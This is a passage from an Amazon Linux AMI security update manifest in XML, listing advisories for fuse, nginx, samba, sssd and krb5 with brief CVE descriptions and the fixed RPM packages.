arch="i686"><filename>Packages/postgresql96-server-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.11-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.11" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.11-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1123</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1123: medium priority package update for fuse</title><issued date="2019-04-17 18:45:00" /><updated date="2019-04-19 16:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10906:
A vulnerability was discovered in fuse. When SELinux is active, fusermount is vulnerable to a restriction bypass. This allows non-root users to mount a FUSE file system with the &#039;allow_other&#039; mount option regardless of whether &#039;user_allow_other&#039; is set in the fuse configuration. An attacker may use this flaw to mount a FUSE file system, accessible by other users, and trick them into accessing files on that file system, possibly causing Denial of Service or other unspecified effects.
1602996:
CVE-2018-10906 fuse: bypass of the "user_allow_other" restriction when SELinux is active
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10906" title="" id="CVE-2018-10906" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fuse-devel" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-devel-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-libs-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-debuginfo-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse" version="2.9.4" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/fuse-2.9.4-1.18.amzn1.x86_64.rpm</filename></package><package name="fuse-libs" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-libs-2.9.4-1.18.amzn1.i686.rpm</filename></package><package name="fuse-debuginfo" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-debuginfo-2.9.4-1.18.amzn1.i686.rpm</filename></package><package name="fuse-devel" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-devel-2.9.4-1.18.amzn1.i686.rpm</filename></package><package name="fuse" version="2.9.4" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/fuse-2.9.4-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1125</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1125: medium priority package update for nginx</title><issued date="2018-12-13 17:27:00" /><updated date="2018-12-14 01:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16844:
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the &#039;http2&#039; option of the &#039;listen&#039; directive is used in a configuration file.
1644510:
CVE-2018-16844 nginx: Excessive CPU usage via flaw in HTTP/2 implementation
CVE-2018-16843:
nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the &#039;http2&#039; option of the &#039;listen&#039; directive is used in a configuration file.
1644511:
CVE-2018-16843 nginx: Excessive memory consumption via flaw in HTTP/2 implementation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16843" title="" id="CVE-2018-16843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16844" title="" id="CVE-2018-16844" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.14.1" release="2.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.14.1-2.34.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.14.1-2.34.amzn1.i686.rpm</filename></package><package name="nginx" version="1.14.1" release="2.34.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.14.1-2.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1126</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1126: medium priority package update for samba</title><issued date="2019-01-22 17:55:00" /><updated date="2019-01-25 02:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1139:
A flaw was found in the way samba allowed the use of weak NTLMv1 authentication even when NTLMv1 was explicitly disabled. A man-in-the-middle attacker could use this flaw to read the credential and other details passed between the samba server and client.
1589651:
CVE-2018-1139 samba: Weak authentication protocol regression
CVE-2018-10858:
A heap-buffer overflow was found in the way samba clients processed extra long filename in a directory listing. A malicious samba server could use this flaw to cause arbitrary code execution on a samba client.
1612805:
CVE-2018-10858 samba: Insufficient input validation in libsmbclient
CVE-2018-1050:
A null pointer dereference flaw was found in Samba RPC external printer service. An attacker could use this flaw to cause the printer spooler service to crash.
1538771:
CVE-2018-1050 samba: NULL pointer dereference in printer server process
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1050" title="" id="CVE-2018-1050" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10858" title="" id="CVE-2018-10858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1139" title="" id="CVE-2018-1139" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-winbind-krb5-locator" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.8.3" release="4.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.8.3-4.amzn1.noarch.rpm</filename></package><package name="samba-client-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.8.3" release="4.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.8.3-4.amzn1.noarch.rpm</filename></package><package name="samba-client" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.8.3" release="4.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.8.3-4.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.8.3-4.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.8.3-4.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.8.3-4.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.8.3-4.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.8.3" release="4.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.8.3-4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1127</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1127: low priority package update for sssd</title><issued date="2019-01-22 18:00:00" /><updated date="2019-01-25 02:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10852:
The UNIX pipe which sudo uses to contact SSSD and read the available sudo rules from SSSD utilizes too broad of a set of permissions. Any user who can send a message using the same raw protocol that sudo and SSSD use can read the sudo rules available for any user.
1588810:
CVE-2018-10852 sssd: information leak from the sssd-sudo responder
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10852" title="" id="CVE-2018-10852" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sssd" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.2" release="13.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.16.2-13.amzn1.noarch.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.2-13.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.16.2-13.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.2-13.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.2" release="13.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.2-13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1129</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1129: low priority package update for krb5</title><issued date="2019-01-23 18:58:00" /><updated date="2019-01-25 02:39:00" /><severity>low</severity><description>Package updates are available for 